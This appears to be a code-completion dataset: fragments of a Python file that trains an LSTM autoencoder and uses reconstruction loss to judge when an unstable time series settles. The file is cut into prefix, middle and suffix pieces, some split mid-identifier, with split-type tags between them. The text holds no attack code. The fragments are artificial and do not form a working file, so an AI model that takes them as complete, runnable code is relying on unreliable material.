plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigure(self, truth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend()
| houtImprovement += 1
| conditional_block |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses |
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigure(self, truth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend() | random_line_split | |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigu | ruth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend()
| re(self, t | identifier_name |
AutoEncoderBasedEvaluation.py | import copy
import numpy as np
import DataLoader
import torch
import seaborn as sns
import matplotlib.pyplot as plt
from scipy import signal
from scipy.signal import find_peaks
from statsmodels import api as sm
from sklearn.preprocessing import MinMaxScaler
from torch import nn
from LstmAutoEncoder import LstmAutoEncoder
from Model import Model
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class LstmAutoEncoderModel(Model):
def __init__(self, windowSize, maxEpoch, paramIndex, learningRate, threshold):
self.windowSize = windowSize
self.maxEpoch = maxEpoch
self.paramIndex = paramIndex
self.learningRate = learningRate
self.threshold = threshold
self.embeddingDim = 128
self.normalData = DataLoader.NormalDataLoader(self.paramIndex, 'train')
self.unstableData = DataLoader.UnstableDataLoader(self.paramIndex, 'test')
self.wantToShuffle = False
self.statistics = {}
def preProcess(self):
|
@staticmethod
def findCycle(sequence):
normalizedStable = sequence - np.mean(sequence)
# acf = sm.tsa.acf(normalizedStable, nlags=len(normalizedStable), fft=False) # auto correlation
peaks, _ = find_peaks(normalizedStable.to_numpy().flatten())
if peaks.size < 3:
return None
cycle = np.mean(np.diff(peaks))
return cycle
@staticmethod
def convertToTensor(dataset):
dataset = [torch.tensor(s).unsqueeze(1).float() for s in dataset]
# N, windowSize, 1
numberOfSequences, lengthOfSubsequence, numberOfFeatures = torch.stack(dataset).shape
return dataset, lengthOfSubsequence, numberOfFeatures
@staticmethod
def collectMeanStd(dataset):
meanList, stdList = [], []
for seq in dataset:
meanList.append(seq.mean())
stdList.append(seq.std())
return meanList, stdList
def train(self, train, valid, lengthOfSubsequence, numberOfFeatures):
model = LstmAutoEncoder(lengthOfSubsequence, numberOfFeatures, 128) # why 128??? example 이 140이어서?
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=self.learningRate)
criterion = nn.L1Loss(reduction='sum').to(device)
bestModel = copy.deepcopy(model.state_dict())
bestLoss = np.inf
# early stop epoch: 10% of max epoch
earlyStopThreshold = self.maxEpoch * 0.1
countWithoutImprovement = 0
for epoch in range(1, self.maxEpoch + 1):
model = model.train()
trainLossList = []
for seqTrue in train:
optimizer.zero_grad()
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
loss.backward()
optimizer.step()
trainLossList.append(loss.item())
validLossList = []
model = model.eval()
with torch.no_grad():
for seqTrue in valid:
seqTrue = seqTrue.to(device)
seqPrediction = model(seqTrue)
loss = criterion(seqPrediction, seqTrue)
validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
